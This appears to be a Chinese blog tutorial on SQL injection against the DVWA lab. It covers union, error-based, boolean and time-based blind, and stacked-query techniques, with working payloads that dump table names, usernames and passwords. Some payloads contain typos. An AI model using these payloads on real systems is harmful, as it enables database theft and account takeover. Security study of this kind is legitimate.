【网络安全的神秘世界】SQL注入漏洞

2024-06-23 19:36

本文主要是介绍【网络安全的神秘世界】SQL注入漏洞,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在这里插入图片描述

🌝博客主页:泥菩萨

💖专栏:Linux探索之旅 | 网络安全的神秘世界 | 专接本 | 每天学会一个渗透测试工具

本章知识使用的靶场:DVWA

一、漏洞简介

SQL:结构化查询语言,是一种特殊的编程语言,用于数据库中的标准数据查询语言

SQL注入:简而言之就是,攻击者通过系统正常的输入数据的功能,输入恶意数据,而系统又未做任何校验或校验不严格,直接信任了用户输入,使得恶意输入改变原本的SQL逻辑或者执行了额外的SQL语句,造成SQL注入攻击。

SQL注入漏洞产生需要满足的条件:

1、参数是用户可控的:前端传给后端的参数内容是用户可控的(在前端有输入点)

2、参数的值传给数据库:传入的参数拼接到SQL语句,且带入数据库做查询(尽量不做别的操作,会影响业务)

二、漏洞危害

可以获取敏感信息、修改信息、脱裤、上传webshell执行命令

【脱裤】:把整个数据库下载下来

【上传webshell】:上传脚本文件

三、SQL注入分类

在学习SQL注入之前,我们先了解一个概念”隐式转换“:

在Mysql数据库中,如果某个参数是int类型,在该参数赋值时,传递一个字符串,就会自动去识别字符串的第一个字符
如果第一个字符是数字,则转换成int类型;
如果第一个字符不是数字,则转换失败,不会继续向后识别

在这里插入图片描述

当id=1时查不到,因为id的类型是字符串,没有隐式转换

在这里插入图片描述

3.1 数字型int

当输入的参数类型(type)为整型时,若存在注入漏洞,就叫数字型注入。测试步骤如下:

#如果前端页面没有输入点,我们也可以通过URL或Bp抓包进行漏洞测试
1.加单引号,URL:www.text.com/text.php?id=1'
对应的sq1:select * from table where id=1'这时sq]语句出错,程序无法正常从数据库中查询出数据,就会抛出异常;此时可以判断大概率存在注入,因为只有服务器将这个单引号一起当作SQL语句执行时才会报错,但是并不绝对,也有可能是程序本身的问题引起报错。2.and 1=1,URL:www.text.com/text.php?id=l and 1=1
对应的sq1:select *from tpble where id=1 and 1=1 存在注入,语句执行正常能查询出来数据;否则返回报错3.and 1=2,URL:www.text.com/text.php?id=l and 1=2
对应的sq1:select* from table where id=1 and 1=2 为了进一步验证存在注入,把and 1=1改成and 1=2,语句可以正常执行,但是无法查询出结果,证明存在注入

在执行第3步时,按照正常逻辑前端页面是不应该返回结果的

在这里插入图片描述

很疑惑,去后端构建代码查看一下发现(实际渗透中接触不到后端):

查询数字型1 and 1=2时,逻辑正常没有返回结果

查询字符型’1 and 1=2’时,做了隐式转换有返回结果

在这里插入图片描述

那我们只能去这个DVWA靶场看源代码,原来是这个靶场在用户输入内容的左右两端加了单引号(做了额外处理)

在这里插入图片描述

如果满足以上三点,且程序本身没有对用户的输入做任何额外处理,则可以判断该URL存在数字型注入

----------------------在实际过程中,如果网站做了额外处理该怎么查看?

我们压根看不到额外处理,所有我们只能不停的构造SQL注入语句,通过回显来推断做了什么处理

3.2 字符型varchar

当输入的参数类型(type)为字符型时,若存在注入漏洞,就叫字符型型注入

字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

根据3.1的步骤,DVWA靶场做了额外处理,所以我们可以暂时当作字符型注入:

为什么是暂时当作?

因为是网站做了处理,不影响数据库里的实际类型,所以本身是数值型注入

1 and 1=1

从逻辑上看,‘1 and 1=1’作为字符串时,是查不出结果的(数据库中不会有id的值为1 and 1=1),那我们就无法验证这个漏洞,所以,在实际测试中,我们要让构造好的语句从字符型的单引号中出来,从而进行逻辑判断,才能验证自己所思考的逻辑

因此,在构造payload时通过闭合单引号可以成功执行语句:

//截断注释方法
尝试输入:1' and 1=1 #

在数据中的语句就是:

select * from user where id ='1' and 1=1 #'

3.3 联合查询注入union

通过union或union all操作符连接多条SELECT语句进行查询

  • union:会自动去除结果集中的重复行
  • union all:会将所有查询结果合并在一起,包括重复的行(在实际渗透中使用,保证信息不遗漏)

联合查询使用条件:union all左右两边的查询列数保持一致,页面上有显示位

在这里插入图片描述

关于显示位我们要考虑两点:1.有没有 2.够不够

1️⃣有没有:看能不能返回查询条件的结果

通过order by帮我们判断前端页面上给我们显示几列

1' order by 1#

查3的时候报错了,查1和2的时候都没报错,证明有2列显示位

在这里插入图片描述

还有一种方法,使用联合查询,1,2表示无意义位,也是为了判断有没有显示位

1' union all select 1,2

在这里插入图片描述

2️⃣够不够:页面的显示位不足,会导致返回的结果不全

✨显示位只有1位:调换查询顺序

1' union all select user(),database()#

在这里插入图片描述

1' union all select database(),user()#

在这里插入图片描述

✨前端页面篇幅有限,只能显示一行:让union all左边查询不出来内容

-1' union all select 1,2#

在这里插入图片描述

✨前端页面篇幅有限,无法展示多行查询结果:使用group_concat()把同一列的多行合并到同一行

1' union all select 1,group_concat(user) from users#

在这里插入图片描述

在讲解如何利用Union注入进一步获取数据库名、表名、字段名以及字段中的数据之前,先介绍一个重要的知识点:MySQL 5.0以上版本,存在一个自带的数据库名为:information_schema

information_schema包含所有的库信息,所以拿下它就能拿下业务数据库DVWA,为我们渗透测试提供了很大的便利

information_schema数据库中有三个表非常重要:

schemata: 所有数据库的名字
tables: 所有数据库的所有表
columns: 所有数据库的所有表的所有字段

三个列非常重要:

table_schema:数据库名
table_name:表名
column_name:字段名

现在利用information_schema这个库进行查询

渗透层次结构流程:库名——>表名——>字段名——>数据

🚀从information_schema数据库中查找库名

1' union all select schema_name,1 from information_schema.schemata#

🚀从information_schema数据库中的table里查询当前数据库的表名

1' union all select table_name,1 from information_schema.tables where table_schema=database()#

🚀查找dvwa库的users表下有哪些字段

1' union all select column_name,1 from information_schema.columns where table_sechema='dvwa' and table_name='users'

🚀得到用户名和密码

1' union all select user,password from users#

3.4 报错注入

主要是利用数据库报错来进行判断是否存在注入点,如果不符合数据库语法规则就会报错并返回错误信息

目的:通过报错查询到我们想要的信息

常用的报错特殊字符:' \ ; %00 ) ( # ''

在MySQL高版本(>5.1版本)中添加了对XML文档进行查询和修改的函数,这两个函数常用于报错注入:

extractvalue()
updatexml()

原因:当这两个函数在执行时,如果出现XML文档路径错误就会产生报错

extractvalue()函数

此函数从目标XML中返回包含所查询值的字符串

extractvalue(xml_document, xpath_string)
  • xml_document:是一个字符串格式的XML文档对象名称
  • xpath_string:是一个XPath格式的字符串

基本上第一个参数随便写,第二个参数会出现报错,所以在第二个参数位置上构造代码利用报错返回我们想要的信息

在这里插入图片描述

这种情况下就是我们想要的函数语法报错(原因:路径下不会存在~)

前端代码:1' extractvalue(1,'~') #

在这里插入图片描述

但有时候前端通往后端的过程会校验‘,我们可以通过16进制绕过

select hex('~') //~转换为16进制:0x7e

在这里插入图片描述

怎么在报错的情况下查找到我们想要的信息:利用concat()字符串拼接函数

在这里插入图片描述

注入思路:库名——>表名——>列名——>字段名

# 爆库名
1and extractvalue(1,concat(0x7e,database()))## 爆表数
1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema='dvwa')));## 爆表名 
<!-- 爆破长度有限,group_concat()方法显示的不完整,要使用limit -->
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')));#1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)));## 爆字段数
1' and extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='user')));## 爆字段名
1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='user' limit 0,1)));## 爆数据长度
1' and extractvalue(1,concat(0x7e,(select length(password) from users where user_id=1)));## 爆数据
<!-- 因为只让查1列,通过concat()把2列合并成1列,但是发现数据不全借助substr() -->
1' and extractvalue(1,concat(0x7e,(select concat(user,password) from users where user_id=1)));#
1' and extractvalue(1,concat(0x7e,(select substr(password,32,1) from users where user_id=1)));#

limit m,n:表示从第m+1条开始,取n条

updatexml()函数
updatexml(xml_document, XPath_string, new_value)

注入过程和extractvalue()函数一样,只不过多了一个参数

第三个参数随便写点啥都行,比如:1

3.5 盲注

只会根据注入信息返回True或False,没有之前的查询信息或者报错信息

3.5.1 布尔注入

1、判断是否存在注入,注入的类型

2、猜测当前数据库名称

猜测当前数据库库名的长度

1' and length(database()) > 3;#

猜测当前数据库的名称:取当前字符串的第一个字符转换为ASCII码与100进行比较

1' and ascii(substr(database(),1,1)) > 100;#

3、猜测数据库下的表名

猜测表的个数

1' and (select(select count(table_name) from information_schema.tables where table_schema = 'dvwa')) > 2;#

取第一个表,猜测表名的长度

1' and  length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)) > 5;#

猜测表名

1' and  (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='dvwa' limit 0,1) >100;#

4、猜测表中字段名

猜测字段的个数

1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users') > 10;#

再用上述手工注入方法就太麻烦了,我们直接猜测数据库中可能存在的字段名称(如果猜测不出来还是继续手工注入吧😂)

用户名:username/user_name/uname/u_name/user/name/…

密码:password/pass_word/pwd/pass/…

# 已知数据库为dvwa,表名为users,猜字段名为phone
1' and (select count(*) from information_schema.columns where table_schema='dwwa' and table_name='users' and column_name ='user')=1;#

5、获取表中的字段值

1)用户名的字段值

# 爆长度
1' and length((select user from users limit 0,1))>5;## 逐个爆破字符
1' and (select ascii(substr(user,1,1) from users limit 0,1)>100;#

2)密码的字段值

# 爆长度
1' and length(substr((select password from users limit 0,1),1)>33;## 逐个爆破字符

6、验证字段值的有效性

将拿到的用户名和密码填写到前端登陆界面的输入框中,尝试登录是否成功

3.5.2 时间盲注

界面返回值只有一种True,我们可以通过if和sleep函数,根据页面返回的时间差来判断注入的语句是否正确

猜测当前连接数据库的名称

1' and if(length(database())=4,sleep(3),1)#;

盲注需要掌握的几种函数

  • length():返回字符串的长度
  • substr():截取字符串
  • ascii():返回字符的ascii码
  • sleep():将程序挂起一段时间

3.6 堆叠查询

多条SQL语句一起执行

使用条件:MySQL数据库的搜索引擎用到了mysqli_muli_query()

使用方法:直接在输入框输入多条SQL语句用;分隔


至此,对sql注入分类总结一下:

  • 根据查询字段:数字型、字符型
  • 根据查询方式:union注入、堆叠注入
  • 根据回显:报错、盲注

这篇关于【网络安全的神秘世界】SQL注入漏洞的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1088075

相关文章

SQL中的外键约束

外键约束用于表示两张表中的指标连接关系。外键约束的作用主要有以下三点: 1.确保子表中的某个字段(外键)只能引用父表中的有效记录2.主表中的列被删除时,子表中的关联列也会被删除3.主表中的列更新时,子表中的关联元素也会被更新 子表中的元素指向主表 以下是一个外键约束的实例展示

基于MySQL Binlog的Elasticsearch数据同步实践

一、为什么要做 随着马蜂窝的逐渐发展,我们的业务数据越来越多,单纯使用 MySQL 已经不能满足我们的数据查询需求,例如对于商品、订单等数据的多维度检索。 使用 Elasticsearch 存储业务数据可以很好的解决我们业务中的搜索需求。而数据进行异构存储后,随之而来的就是数据同步的问题。 二、现有方法及问题 对于数据同步,我们目前的解决方案是建立数据中间表。把需要检索的业务数据,统一放到一张M

如何去写一手好SQL

MySQL性能 最大数据量 抛开数据量和并发数,谈性能都是耍流氓。MySQL没有限制单表最大记录数,它取决于操作系统对文件大小的限制。 《阿里巴巴Java开发手册》提出单表行数超过500万行或者单表容量超过2GB,才推荐分库分表。性能由综合因素决定,抛开业务复杂度,影响程度依次是硬件配置、MySQL配置、数据表设计、索引优化。500万这个值仅供参考,并非铁律。 博主曾经操作过超过4亿行数据

性能分析之MySQL索引实战案例

文章目录 一、前言二、准备三、MySQL索引优化四、MySQL 索引知识回顾五、总结 一、前言 在上一讲性能工具之 JProfiler 简单登录案例分析实战中已经发现SQL没有建立索引问题,本文将一起从代码层去分析为什么没有建立索引? 开源ERP项目地址:https://gitee.com/jishenghua/JSH_ERP 二、准备 打开IDEA找到登录请求资源路径位置

MySQL数据库宕机,启动不起来,教你一招搞定!

作者介绍:老苏,10余年DBA工作运维经验,擅长Oracle、MySQL、PG、Mongodb数据库运维(如安装迁移,性能优化、故障应急处理等)公众号:老苏畅谈运维欢迎关注本人公众号,更多精彩与您分享。 MySQL数据库宕机,数据页损坏问题,启动不起来,该如何排查和解决,本文将为你说明具体的排查过程。 查看MySQL error日志 查看 MySQL error日志,排查哪个表(表空间

揭秘世界上那些同时横跨两大洲的国家

我们在《世界人口过亿的一级行政区分布》盘点全球是那些人口过亿的一级行政区。 现在我们介绍五个横跨两州的国家,并整理七大洲和这些国家的KML矢量数据分析分享给大家,如果你需要这些数据,请在文末查看领取方式。 世界上横跨两大洲的国家 地球被分为七个大洲分别是亚洲、欧洲、北美洲、南美洲、非洲、大洋洲和南极洲。 七大洲示意图 其中,南极洲是无人居住的大陆,而其他六个大洲则孕育了众多国家和

MySQL高性能优化规范

前言:      笔者最近上班途中突然想丰富下自己的数据库优化技能。于是在查阅了多篇文章后,总结出了这篇! 数据库命令规范 所有数据库对象名称必须使用小写字母并用下划线分割 所有数据库对象名称禁止使用mysql保留关键字(如果表名中包含关键字查询时,需要将其用单引号括起来) 数据库对象的命名要能做到见名识意,并且最后不要超过32个字符 临时库表必须以tmp_为前缀并以日期为后缀,备份

[MySQL表的增删改查-进阶]

🌈个人主页:努力学编程’ ⛅个人推荐: c语言从初阶到进阶 JavaEE详解 数据结构 ⚡学好数据结构,刷题刻不容缓:点击一起刷题 🌙心灵鸡汤:总有人要赢,为什么不能是我呢 💻💻💻数据库约束 🔭🔭🔭约束类型 not null: 指示某列不能存储 NULL 值unique: 保证某列的每行必须有唯一的值default: 规定没有给列赋值时的默认值.primary key:

MySQL-CRUD入门1

文章目录 认识配置文件client节点mysql节点mysqld节点 数据的添加(Create)添加一行数据添加多行数据两种添加数据的效率对比 数据的查询(Retrieve)全列查询指定列查询查询中带有表达式关于字面量关于as重命名 临时表引入distinct去重order by 排序关于NULL 认识配置文件 在我们的MySQL服务安装好了之后, 会有一个配置文件, 也就

Java 连接Sql sever 2008

Java 连接Sql sever 2008 /Sql sever 2008 R2 import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement; public class TestJDBC